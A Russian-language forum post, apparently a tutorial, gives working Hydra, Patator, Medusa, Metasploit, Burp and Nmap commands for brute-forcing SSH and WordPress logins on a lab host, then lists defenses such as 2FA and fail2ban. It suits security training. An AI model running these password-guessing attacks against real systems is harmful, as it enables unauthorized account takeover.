Бесплатно Brute Force

Everest_RR

Местный
Private Club
Регистрация
8/10/18
Сообщения
232
Репутация
20
Реакции
255
RUB
0
brute-force.jpg

Brute-force атаки

Brute-force (полный перебор) – метод решения математических задач, на сложность которых влияет количество всех возможных решений. Термин принято использовать в контексте хакерских атак в том случае, когда злоумышленник данным способом подбирает логин и пароль к учетной записи пользователя или какому-либо сервису.

На сегодняшний день существует масса инструментов, с помощью которых можно выполнять Brute-force атаки, рассмотри их ниже.

Brute-force SSH

Понадобится тестовая машина 192.168.60.50. В данном случае будем подбирать пароль пользователя test по SSH и нам понадобится стандартный словарь rockyou.txt.

 Patator

Используем команду:

patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’

 Hydra

Вводим команду:

hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50

 Medusa

Применяем:

medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6

 Metasploit

Нужно задействовать модуль:

use auxiliary/scanner/ssh/ssh_login

И указать необходимые параметры через команду "set".

Brute-force WordPress

Подбор пароля осуществляется методом авторизации веб-формы. Воспользуемся учетной записью администратора wordpress.

BurpSuite

Пробуем авторизоваться, используя любой пароль и логин. Делаем это ля просмотра запросов, проходящих через BurpSuite. Ищем POST запрос и работаем с ним. BODY содержит данную информацию и при желании мы можем подставлять любые нужные значения.

Далее передаем запрос через Intruder, в Payload Positions оставляем sniper (тип атаки), для проверки применяем pwd. Теперь остается загрузить словарь и начать атаку. Неверный пароль вернет код ответа 200, верный – 302.

Hydra

Пользуемся командой:

hydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"

Patator работает по такому же принципу как Hydra.

Nmap

Позволяет производить пароль паролей для веб-форм авторизации. Для этого используем:

nmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'

В заключение

В данном материале мы кратко пробежались по основным инструментам, с помощью которых можно подобрать пароль. И помните, чтобы избежать атак, не создавайте слишком простые пароли, или те, которые содержат личную информацию (дату рождения, фамилию и т.д.).

Обязательно ограничивайте подключение по IP-адресу, используйте двухфакторную аутентификацию, вовремя блокируйте атаки при помощи SIEM, WAF, fail2ban.
Читать статью на:
 
Сверху Снизу